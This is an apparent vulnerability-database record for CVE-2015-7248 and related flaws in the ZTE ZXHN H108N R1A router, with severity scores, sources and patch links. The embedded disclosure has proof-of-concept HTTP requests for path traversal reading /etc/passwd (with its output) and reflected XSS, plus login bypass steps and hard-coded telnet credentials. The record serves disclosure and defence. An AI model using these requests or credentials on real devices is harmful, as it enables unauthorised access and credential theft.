Details of VAR-201512-0228

ID

VAR-201512-0228

CVE

CVE-2015-7248

TITLE

ZTE ZXHN H108N R1A Information Disclosure Vulnerability

Trust: 1.2

sources: CNVD: CNVD-2015-07623 // CNNVD: CNNVD-201511-236

DESCRIPTION

ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allow remote attackers to discover usernames and password hashes by reading the cgi-bin/webproc HTML source code, a different vulnerability than CVE-2015-8703. ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10 W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities. ZTE ZXHN H108N R1A is a wireless router product of China ZTE Corporation. ZTE ZXHN H108N R1A routers are prone to the following security vulnerabilities: 1. Multiple information-disclosure vulnerabilities 2. An authorization-bypass vulnerability 3. A directory-traversal vulnerability 4. A hard-coded credentials vulnerability 5. A cross-site scripting vulnerability Attackers can exploit these issues to gain access to the browser of an unsuspecting user and execute arbitrary script code in the context of the affected site, steal cookie-based authentication credentials, gain access to sensitive information, read arbitrary files, or bypass security restrictions and perform unauthorized actions. This may aid in further attacks. *CVE-ID*: CVE-2015-7248 CVE-2015-7249 CVE-2015-7250 CVE-2015-7251 CVE-2015-7252 *Note*: Large deployment size, primarily in Peru, used by TdP. Description *CWE-200* <https://cwe.mitre.org/data/definitions/200.html>*: Information Exposure* - CVE-2015-7248 Multiple information exposure vulnerabilities enable an attacker to obtain credentials and other sensitive details about the ZXHN H108N R1A. A. User names and password hashes can be viewed in the page source of http://<IP>/cgi-bin/webproc PoC: Login Page source contents: ...snip.... //get user info var G_UserInfo = new Array(); var m = 0; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "admin"; //UserName G_UserInfo[m][1] = "$1$Tsnipped/; //Password Hash seen here G_UserInfo[m][2] = "1"; //Level G_UserInfo[m][3] = "1"; //Index m++; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "user"; //UserName G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here G_UserInfo[m][2] = "2"; //Level G_UserInfo[m][3] = "2"; //Index m++; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "support"; //UserName G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here G_UserInfo[m][2] = "2"; //Level G_UserInfo[m][3] = "3"; //Index m++; ...snip... B. The configuration file of the device contains usernames, passwords, keys, and other values in plain text, which can be used by a user with lower privileges to gain admin account access. This issue also affects ZTE ZXV10 W300 models, version W300V1.0.0f_ER1_PE. *CWE-285* <https://cwe.mitre.org/data/definitions/285.html>*: Improper Authorization* - CVE-2015-7249 By default, only admin may authenticate directly with the web administration pages in the ZXHN H108N R1A. By manipulating parameters in client-side requests, an attacker may authenticate as another existing account, such as user or support, and may be able to perform actions otherwise not allowed. PoC 1: 1. Login page user drop-down option shows only admin only. 2. Use an intercepting proxy / Tamper Data - and intercept the Login submit request. 3. Change the username admin to user / support and continue Login. 4. Application permits other users to log in to mgmt portal. PoC 2: After logging in as support, some functional options are visibly restricted. Certain actions can still be performed by calling the url directly. Application does not perform proper AuthZ checks. Following poc is a change password link. It is accessible directly, though it (correctly) is restricted to changing normal user (non-admin) password only. http:// <IP>/cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=accountpsd Other functions / pages may also be accessible to non-privileged users. *CWE-22* <http://cwe.mitre.org/data/definitions/22.html>*: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') *- CVE-2015-7250 The webproc cgi module of the ZXHN H108N R1A accepts a getpage parameter which takes an unrestricted file path as input, allowing an attacker to read arbitrary files on the system. Arbitrary files can be read off of the device. No authentication is required to exploit this vulnerability. PoC HTTP POST request POST /cgibin/webproc HTTP/1.1 Host: IP UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 AcceptLanguage: enUS,en;q=0.5 AcceptEncoding: gzip, deflate Referer: https://IP/cgibin/webproc Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin Connection: keepalive ContentType: application/xwwwformurlencoded ContentLength: 177 getpage=html%2Findex.html&errorpage=%2fetc%2fpasswd&var%3Amenu=setup&var%3Apage=wancfg&obj action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a HTTP Response HTTP/1.0 200 OK Contenttype: text/html Pragma: nocache CacheControl: nocache setcookie: sessionid=7ce7bd4a; expires=Fri, 31Dec9999 23:59:59 GMT;path=/ #root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh #tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh *CWE-798* <http://cwe.mitre.org/data/definitions/798.html>*: Use of Hard-coded Credentials* - CVE-2015-7251 In the ZXHN H108N R1A, the Telnet service, when enabled, is accessible using the hard-coded credentials 'root' for both the username and password. *CWE-79* <https://cwe.mitre.org/data/definitions/79.html>*: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') *- CVE-2015-7252 In the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is vulnerable to reflected cross-site scripting [pre-authentication]. PoC POST /cgibin/webproc HTTP/1.1 Host: IP UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 AcceptLanguage: enUS,en;q=0.5 AcceptEncoding: gzip, deflate Referer: https://IP/cgibin/webproc Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin Connection: keepalive ContentType: application/xwwwformurlencoded ContentLength: 177 getpage=html%2Findex.html&*errorpage*=html%2fmain.html<script>alert(1)</script>&var%3Amenu=setup&var%3Apage=wancfg&obj action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a +++++ -- Best Regards, Karn Ganeshen

Trust: 3.42

sources: NVD: CVE-2015-7248 // CERT/CC: VU#391604 // JVNDB: JVNDB-2015-006587 // CNVD: CNVD-2015-07623 // BID: 77421 // VULHUB: VHN-85209 // VULMON: CVE-2015-7248 // PACKETSTORM: 134492

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2015-07623

AFFECTED PRODUCTS

vendor:	zte	model:	zxhn h108n r1a	scope:	lte	version:	zte.bhs.zxhnh108nr1a.h_pe	Trust: 1.0
vendor:	zte	model:	-	scope:	-	version:	-	Trust: 0.8
vendor:	zte	model:	zxhn h108n r1a	scope:	-	version:	-	Trust: 0.8
vendor:	zte	model:	zxhn h108n r1a	scope:	lt	version:	zte.bhs.zxhnh108nr1a.k_pe	Trust: 0.8
vendor:	zte	model:	zxhn h108n r1a zte.bhs.zxhnh108nr1a.h pe	scope:	-	version:	-	Trust: 0.6
vendor:	zte	model:	zxhn h108n r1a zxv10 w300 w300v1.0.0f er1 pe	scope:	-	version:	-	Trust: 0.6
vendor:	zte	model:	zxhn h108n r1a	scope:	eq	version:	zte.bhs.zxhnh108nr1a.h_pe	Trust: 0.6
vendor:	zte	model:	zxv10 w300 w300v1.0.0f er1 pe	scope:	-	version:	-	Trust: 0.3
vendor:	zte	model:	zxhn h108n r1a zte.bhs.zxhnh108nr1a	scope:	-	version:	-	Trust: 0.3
vendor:	zte	model:	zxhn h108n r1a zte.bhs.zxhnh108nr1a	scope:	ne	version:	-	Trust: 0.3

sources: CERT/CC: VU#391604 // CNVD: CNVD-2015-07623 // BID: 77421 // JVNDB: JVNDB-2015-006587 // CNNVD: CNNVD-201511-236 // NVD: CVE-2015-7248

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2015-7248
value:	HIGH
Trust: 1.0
NVD:	CVE-2015-7248
value:	MEDIUM
Trust: 0.8
CNVD:	CNVD-2015-07623
value:	MEDIUM
Trust: 0.6
CNNVD:	CNNVD-201511-236
value:	MEDIUM
Trust: 0.6
VULHUB:	VHN-85209
value:	MEDIUM
Trust: 0.1
VULMON:	CVE-2015-7248
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2015-7248
severity:	MEDIUM
baseScore:	5.0
vectorString:	AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.9
CNVD:	CNVD-2015-07623
severity:	MEDIUM
baseScore:	6.1
vectorString:	AV:A/AC:L/AU:N/C:C/I:N/A:N
accessVector:	ADJACENT_NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	6.5
impactScore:	6.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-85209
severity:	MEDIUM
baseScore:	5.0
vectorString:	AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2015-7248
baseSeverity:	HIGH
baseScore:	7.5
vectorString:	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	3.9
impactScore:	3.6
version:	3.0
Trust: 1.0

sources: CNVD: CNVD-2015-07623 // VULHUB: VHN-85209 // VULMON: CVE-2015-7248 // JVNDB: JVNDB-2015-006587 // CNNVD: CNNVD-201511-236 // NVD: CVE-2015-7248

PROBLEMTYPE DATA

problemtype:

CWE-200

Trust: 1.9

sources: VULHUB: VHN-85209 // JVNDB: JVNDB-2015-006587 // NVD: CVE-2015-7248

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201511-236

TYPE

information disclosure

Trust: 0.6

sources: CNNVD: CNNVD-201511-236

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-006587

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-85209 // VULMON: CVE-2015-7248

PATCH

title:	Top Page	url:	http://www.zte.co.jp/	Trust: 0.8
title:	ZTE ZXHN H108N R1A Information Disclosure Vulnerability Patch	url:	https://www.cnvd.org.cn/patchInfo/show/66791	Trust: 0.6
title:	ZTE ZXHN H108N R1A Repair measures for information disclosure vulnerabilities	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=58729	Trust: 0.6

sources: CNVD: CNVD-2015-07623 // JVNDB: JVNDB-2015-006587 // CNNVD: CNNVD-201511-236

EXTERNAL IDS

db:	CERT/CC	id:	VU#391604	Trust: 4.3
db:	NVD	id:	CVE-2015-7248	Trust: 3.6
db:	BID	id:	77421	Trust: 1.5
db:	EXPLOIT-DB	id:	38773	Trust: 1.2
db:	JVN	id:	JVNVU91514956	Trust: 0.8
db:	JVNDB	id:	JVNDB-2015-006587	Trust: 0.8
db:	CNNVD	id:	CNNVD-201511-236	Trust: 0.7
db:	CNVD	id:	CNVD-2015-07623	Trust: 0.6
db:	PACKETSTORM	id:	134492	Trust: 0.3
db:	SEEBUG	id:	SSVID-89799	Trust: 0.1
db:	VULHUB	id:	VHN-85209	Trust: 0.1
db:	VULMON	id:	CVE-2015-7248	Trust: 0.1

sources: CERT/CC: VU#391604 // CNVD: CNVD-2015-07623 // VULHUB: VHN-85209 // VULMON: CVE-2015-7248 // BID: 77421 // JVNDB: JVNDB-2015-006587 // PACKETSTORM: 134492 // CNNVD: CNNVD-201511-236 // NVD: CVE-2015-7248

REFERENCES

url:	https://www.kb.cert.org/vuls/id/391604	Trust: 3.6
url:	https://www.kb.cert.org/vuls/id/bluu-9zdjwa	Trust: 2.6
url:	https://www.exploit-db.com/exploits/38773/	Trust: 1.3
url:	http://www.securityfocus.com/bid/77421	Trust: 1.2
url:	https://cwe.mitre.org/data/definitions/200.html	Trust: 0.9
url:	https://cwe.mitre.org/data/definitions/285.html	Trust: 0.8
url:	https://cwe.mitre.org/data/definitions/288.html	Trust: 0.8
url:	http://cwe.mitre.org/data/definitions/22.html	Trust: 0.8
url:	http://cwe.mitre.org/data/definitions/798.html	Trust: 0.8
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7248	Trust: 0.8
url:	http://jvn.jp/vu/jvnvu91514956/index.html	Trust: 0.8
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-7248	Trust: 0.8
url:	http://www.zte.com.cn/	Trust: 0.3
url:	https://nvd.nist.gov	Trust: 0.1
url:	https://packetstormsecurity.com/files/134492/zte-zxhn-h108n-r1a-zxv10-w300-traversal-disclosure-authorization.html	Trust: 0.1
url:	https://cwe.mitre.org/data/definitions/200.html>*:	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2015-7250	Trust: 0.1
url:	http://cwe.mitre.org/data/definitions/22.html>*:	Trust: 0.1
url:	http://cwe.mitre.org/data/definitions/798.html>*:	Trust: 0.1
url:	https://www.zte.com.cn]	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2015-7249	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2015-7252	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2015-7248	Trust: 0.1
url:	http://<ip>/cgi-bin/webproc	Trust: 0.1
url:	https://cwe.mitre.org/data/definitions/285.html>*:	Trust: 0.1
url:	https://ip/cgibin/webproc	Trust: 0.1
url:	https://cwe.mitre.org/data/definitions/79.html>*:	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2015-7251	Trust: 0.1

CREDITS

Karn Ganeshen

Trust: 0.4

sources: BID: 77421 // PACKETSTORM: 134492

SOURCES

db:	CERT/CC	id:	VU#391604
db:	CNVD	id:	CNVD-2015-07623
db:	VULHUB	id:	VHN-85209
db:	VULMON	id:	CVE-2015-7248
db:	BID	id:	77421
db:	JVNDB	id:	JVNDB-2015-006587
db:	PACKETSTORM	id:	134492
db:	CNNVD	id:	CNNVD-201511-236
db:	NVD	id:	CVE-2015-7248

LAST UPDATE DATE

2025-04-13T23:03:36.356000+00:00

SOURCES UPDATE DATE

db:	CERT/CC	id:	VU#391604	date:	2015-11-04T00:00:00
db:	CNVD	id:	CNVD-2015-07623	date:	2015-11-17T00:00:00
db:	VULHUB	id:	VHN-85209	date:	2017-09-13T00:00:00
db:	VULMON	id:	CVE-2015-7248	date:	2017-09-13T00:00:00
db:	BID	id:	77421	date:	2016-02-02T20:05:00
db:	JVNDB	id:	JVNDB-2015-006587	date:	2016-01-05T00:00:00
db:	CNNVD	id:	CNNVD-201511-236	date:	2015-12-31T00:00:00
db:	NVD	id:	CVE-2015-7248	date:	2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:	CERT/CC	id:	VU#391604	date:	2015-11-03T00:00:00
db:	CNVD	id:	CNVD-2015-07623	date:	2015-11-17T00:00:00
db:	VULHUB	id:	VHN-85209	date:	2015-12-30T00:00:00
db:	VULMON	id:	CVE-2015-7248	date:	2015-12-30T00:00:00
db:	BID	id:	77421	date:	2015-11-04T00:00:00
db:	JVNDB	id:	JVNDB-2015-006587	date:	2016-01-05T00:00:00
db:	PACKETSTORM	id:	134492	date:	2015-11-20T22:24:32
db:	CNNVD	id:	CNNVD-201511-236	date:	2015-11-13T00:00:00
db:	NVD	id:	CVE-2015-7248	date:	2015-12-30T05:59:01.287